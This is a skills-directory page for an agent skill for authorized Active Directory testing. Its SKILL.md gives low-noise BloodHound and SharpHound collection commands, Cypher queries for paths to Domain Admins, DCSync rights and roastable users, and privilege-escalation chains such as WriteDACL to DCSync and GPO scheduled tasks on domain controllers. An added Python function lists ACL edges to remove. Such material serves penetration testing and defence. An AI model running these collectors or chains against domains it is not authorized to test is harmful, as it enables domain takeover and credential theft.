
Active Directory Acl Abuse
Load BloodHound attack-path patterns, stealth collection flags, and Neo4j Cypher queries while you validate Active Directory ACL abuse on an authorized engagement.
Overview
active-directory-acl-abuse is an agent skill for the Ship phase that supplies BloodHound collection playbooks, Neo4j Cypher templates, and ACL chain analysis patterns for authorized Active Directory testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill active-directory-acl-abuse
What is this skill?
- Compares five BloodHound collection modes (DCOnly, All, Session, ACL, ObjectProps) on speed, noise, and data coverage
- Stealth recipes for bloodhound-python (-c DCOnly/Session) and SharpHound (DCOnly, ACL, --stealth, --excludedc)
- Ready Cypher for shortest paths from owned nodes to DOMAIN ADMINS groups
- Cypher to surface users and groups with GetChanges/GetChangesAll chains toward a domain (DCSync-style rights)
- Companion to the repo’s main SKILL.md for individual ACL abuse techniques and chain analysis
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You have BloodHound data but waste cycles guessing collection flags and writing Cypher every time you hunt Domain Admin or DCSync paths from ACL edges.
Who is it for?
Authorized pentesters, defenders doing purple-team graph review, or indie builders maintaining an AD lab who already use BloodHound and Neo4j.
Skip if: Unauthorized domain access, production credential spraying without scope, or teams that only need generic OWASP app checks with no directory context.
When should I use this skill?
Load when you need common BloodHound attack paths, custom Neo4j Cypher queries, or chain analysis for ACL abuse, with the main repo SKILL.md already in context for individual techniques.
What do I get? / Deliverables
You run documented low-noise collectors, execute standard path queries in Neo4j, and hand off specific ACL abuses to the repo’s main SKILL.md techniques with clearer attack chains.
- Documented BloodHound collection command set matched to engagement constraints
- Reusable Cypher queries for priority AD attack paths
- ACL chain notes linked to follow-on abuse techniques from the parent SKILL.md
Journey fit
Identity and ACL abuse validation belongs in Ship when you harden or formally test directory services before exposing admin paths in production. BloodHound graph analysis and DCSync-style path queries are offensive security work—canonical shelf is Ship → security, not generic backend build.
How it compares
Use as a BloodHound/Cypher playbook inside your agent—not as a passive MCP integration or a substitute for SharpHound ingest discipline on its own.
Common Questions / FAQ
Who is active-directory-acl-abuse for?
It is for security practitioners and solo builders on legally scoped Active Directory work who use BloodHound and want agent-guided collection choices and Cypher for ACL-heavy attack paths.
When should I use active-directory-acl-abuse?
Use it during Ship security reviews when ingesting BloodHound graphs, comparing DCOnly versus full collection noise, or querying shortest paths to Domain Admins and DCSync-related rights before remediation planning.
Is active-directory-acl-abuse safe to install?
The skill describes offensive AD techniques; only use on systems you are allowed to test. Review the Security Audits panel on this Prism page and your org policy before running collectors or queries against real domains.
SKILL.md
# BloodHound Attack Paths & Cypher Queries

> **AI LOAD INSTRUCTION**: Load this for common BloodHound attack paths, custom Cypher queries for Neo4j, and chain analysis techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual ACL abuse techniques.

---

## 1. BLOODHOUND DATA COLLECTION BEST PRACTICES

### Collection Methods Comparison

| Method | Speed | Noise | Data |
|---|---|---|---|
| `DCOnly` | Fast | Low | Users, groups, trusts, ACLs (from DC only) |
| `All` | Slow | High | Everything including sessions and local groups |
| `Session` | Medium | Medium | Logged-in user sessions (run multiple times) |
| `ACL` | Medium | Low | ACL data only |
| `ObjectProps` | Fast | Low | Object properties (descriptions, etc.) |

### Stealth Collection

```bash
# Minimum noise — DC only queries
bloodhound-python -d domain.com -u user -p pass -c DCOnly -dc DC01.domain.com

# Add sessions over time
bloodhound-python -d domain.com -u user -p pass -c Session -dc DC01.domain.com

# Avoid SMB enumeration (noisiest)
SharpHound.exe -c DCOnly,ACL --excludedc --stealth
```

---

## 2. ESSENTIAL CYPHER QUERIES

### 2.1 Find All Paths to Domain Admin

```cypher
MATCH p=shortestPath((n)-[*1..]->(m:Group))
WHERE m.name STARTS WITH "DOMAIN ADMINS" AND n.owned = true
RETURN p
```

### 2.2 Find Users with DCSync Rights

```cypher
MATCH p=(n)-[:MemberOf|GetChanges*1..]->(d:Domain)
MATCH p2=(n)-[:MemberOf|GetChangesAll*1..]->(d)
WHERE n:User OR n:Group
RETURN n.name
```

### 2.3 Kerberoastable Users with Paths to DA

```cypher
MATCH (u:User {hasspn:true})
MATCH p=shortestPath((u)-[*1..]->(g:Group))
WHERE g.name STARTS WITH "DOMAIN ADMINS"
RETURN u.name, length(p) AS hops
ORDER BY hops ASC
```

### 2.4 Users with Dangerous ACLs

```cypher
MATCH p=(n:User)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|ForceChangePassword]->(m)
WHERE NOT n.name STARTS WITH "DVTA"
RETURN n.name AS attacker, type(r) AS permission, m.name AS target
```

### 2.5 Find Computers with Unconstrained Delegation

```cypher
MATCH (c:Computer {unconstraineddelegation:true})
WHERE NOT c.name STARTS WITH "DC"
RETURN c.name
```

### 2.6 Find AS-REP Roastable Users

```cypher
MATCH (u:User {dontreqpreauth:true})
RETURN u.name, u.description
```

### 2.7 Computers Where Domain Users Are Local Admin

```cypher
MATCH p=(g:Group {name:"DOMAIN USERS@DOMAIN.COM"})-[:AdminTo]->(c:Computer)
RETURN c.name
```

### 2.8 Find All GPO Controllers

```cypher
MATCH p=(n)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO)
RETURN n.name AS controller, g.name AS gpo, type(r) AS permission
```

### 2.9 Shortest Path from Owned to High-Value Targets

```cypher
MATCH p=shortestPath((n {owned:true})-[*1..]->(m {highvalue:true}))
RETURN p
```

### 2.10 Find LAPS Readers

```cypher
MATCH p=(n)-[:ReadLAPSPassword]->(c:Computer)
RETURN n.name AS reader, c.name AS computer
```

---

## 3. COMMON ATTACK PATH PATTERNS

### Pattern 1: Nested Group Membership → DA

```
lowpriv_user
└── MemberOf → IT-Support
    └── MemberOf → Server-Admins
        └── MemberOf → Domain Admins
```

```cypher
MATCH p=(u:User {name:"LOWPRIV@DOMAIN.COM"})-[:MemberOf*1..5]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.COM"})
RETURN p
```

### Pattern 2: ACL Chain → GenericAll → Password Reset → DA

```
lowpriv_user
└── GenericWrite → helpdesk_user
    └── GenericAll → svc_admin (DA member)
        └── ForceChangePassword → reset password → DA
```

### Pattern 3: WriteDACL → DCSync

```
lowpriv_user
└── WriteDACL on Domain Object
    └── Grant self GetChanges + GetChangesAll
        └── DCSync → all domain hashes
```

### Pattern 4: GPO Abuse → Local Admin on DC

```
lowpriv_user
└── GenericWrite on GPO linked to "Domain Controllers" OU
    └── Add scheduled task via GPO
        └── Task runs on DCs → SYSTEM on DC
```

### Pattern 5: LAPS + Local Admin → Session Hijack

```
lowpriv_user
└── ReadLAPSPassword on TARGET_SERVER
    └── Local admin on TARGET_SERVER
```
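As an added example, not code from the skill or the hack-skills repo: the shortest-path search that query 2.1 and Pattern 2 describe, done in Python over a constructed BloodHound-style edge list so a reviewer preparing remediation can list exactly which ACL edges on the chain to remove. All node names, edges and the `DANGEROUS_ACL` set are constructed for the example.

```python
from collections import deque

# Constructed BloodHound-style edge list (source, relationship, target);
# names follow the NAME@DOMAIN convention the Cypher queries above use.
EDGES = [
    ("LOWPRIV@DOMAIN.COM", "MemberOf", "IT-SUPPORT@DOMAIN.COM"),
    ("IT-SUPPORT@DOMAIN.COM", "GenericWrite", "HELPDESK@DOMAIN.COM"),
    ("HELPDESK@DOMAIN.COM", "GenericAll", "SVC_ADMIN@DOMAIN.COM"),
    ("SVC_ADMIN@DOMAIN.COM", "MemberOf", "DOMAIN ADMINS@DOMAIN.COM"),
    ("LOWPRIV@DOMAIN.COM", "MemberOf", "DOMAIN USERS@DOMAIN.COM"),
    ("DOMAIN USERS@DOMAIN.COM", "AdminTo", "FILESRV01.DOMAIN.COM"),
]

# Edge types queries 2.2, 2.4 and 2.8 treat as dangerous ACL rights; these are
# the edges a defender can remove, unlike group memberships that may be required.
DANGEROUS_ACL = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
                 "ForceChangePassword", "GetChanges", "GetChangesAll"}

def build_adjacency(edges):
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj

def shortest_path(edges, start, goal):
    """BFS over directed edges: in-memory equivalent of Cypher shortestPath()."""
    adj = build_adjacency(edges)
    parent = {start: None}          # node -> (previous node, relationship)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for rel, nxt in adj.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in parent:          # goal unreachable from start
        return []
    path, node = [], goal
    while parent[node] is not None:
        prev, rel = parent[node]
        path.append((prev, rel, node))
        node = prev
    return list(reversed(path))

def remediation_candidates(edges, start, goal):
    """ACL edges on the shortest path; removing any one of them breaks the chain."""
    return [e for e in shortest_path(edges, start, goal) if e[1] in DANGEROUS_ACL]
```

Run `remediation_candidates(EDGES, "LOWPRIV@DOMAIN.COM", "DOMAIN ADMINS@DOMAIN.COM")` to get the two ACL edges (GenericWrite, GenericAll) that carry the constructed chain.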